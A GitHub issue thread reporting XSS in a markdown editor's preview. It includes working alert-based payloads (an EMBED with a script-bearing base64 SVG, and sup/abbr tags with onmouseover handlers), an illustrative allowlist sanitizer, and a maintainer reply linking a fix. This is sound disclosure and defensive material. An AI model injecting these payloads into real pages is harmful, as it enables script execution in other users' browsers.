
XSS vulnerability on <abbr> and <sup><EMBED> label

Open · j1nse opened this issue 6 years ago · 1 comment

This label and attack vector will cause XSS. Payload:

```html
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIGlkPSJ4c3MiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydCgieHNzISIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<sup style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('xss')">sup</sup>
<abbr style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('xss')">abbr</abbr>
```

If you type the payload, the XSS vulnerability will be triggered.

j1nse · Aug 05 '19 09:08
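The three payloads in the report share one root cause: the editor's HTML preview lets through a tag that should never be rendered (`<embed>`) and, on tags that are legitimately allowed (`<sup>`, `<abbr>`), attributes that should never be rendered (`style`, `on*` handlers). The added example below is not the project's code or the fix in the linked pull request; it is an illustrative allowlist filter (tag allowlist plus per-tag attribute allowlist, URL scheme check on `href`) showing the check such a preview needs, run against a shortened, constructed copy of the reported payload.

```javascript
// Added example, not the markdown-editor project's sanitizer. Regex tokenising
// is used here only to keep the demonstration short; a production preview
// should run a DOM-based sanitizer so malformed markup cannot desynchronise it.
const ALLOWED_TAGS = new Set(["p", "a", "em", "strong", "code", "pre", "sup",
  "sub", "abbr", "ul", "ol", "li", "br"]);
// Per-tag attribute allowlist: style and on* handlers are never allowed.
const ALLOWED_ATTRS = { a: new Set(["href", "title"]), abbr: new Set(["title"]) };
const SAFE_URL = /^(https?:|mailto:|#|\/)/i;  // rejects javascript: and data: URLs

function escapeText(text) {
  return text.replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

function sanitizeAttrs(tag, attrText) {
  const allowed = ALLOWED_ATTRS[tag] || new Set();
  const attrRe = /([^\s=\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;
  const kept = [];
  let m;
  while ((m = attrRe.exec(attrText)) !== null) {
    const name = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? "";
    if (!allowed.has(name)) continue;                 // drops style, onmouseover, src
    if (name === "href" && !SAFE_URL.test(value.trim())) continue;
    kept.push(`${name}="${value.replace(/"/g, "&quot;")}"`);
  }
  return kept.length ? " " + kept.join(" ") : "";
}

function sanitizeHtml(html) {
  const tagRe = /<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
  let result = "", last = 0, m;
  while ((m = tagRe.exec(html)) !== null) {
    result += escapeText(html.slice(last, m.index));  // text between tags
    last = tagRe.lastIndex;
    const tag = m[1].toLowerCase();
    if (!ALLOWED_TAGS.has(tag)) continue;             // <embed>, <script>, <object> vanish
    result += m[0].startsWith("</") ? `</${tag}>` : `<${tag}${sanitizeAttrs(tag, m[2])}>`;
  }
  return result + escapeText(html.slice(last));
}

// Constructed sample: the issue's payload with the SVG base64 shortened and a
// harmless title attribute added to show that allowed attributes survive.
const ISSUE_PAYLOAD = '<EMBED SRC="data:image/svg+xml;base64,PHN2Zz4=" type="image/svg+xml" AllowScriptAccess="always"></EMBED> '
  + '<sup style="position:fixed;" onmouseover="alert(\'xss\')">sup</sup> '
  + '<abbr style="position:fixed;" onmouseover="alert(\'xss\')" title="Abbreviation">abbr</abbr>';

function demo() { return sanitizeHtml(ISSUE_PAYLOAD); }
```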

Hi @shequ123, thanks for creating an issue for this! I opened a pull request implementing changes to fix these problems and it correctly blocks those scenarios from happening in the editor. Pull request: https://github.com/jbt/markdown-editor/pull/110

ColeBennett · Oct 25 '19 23:10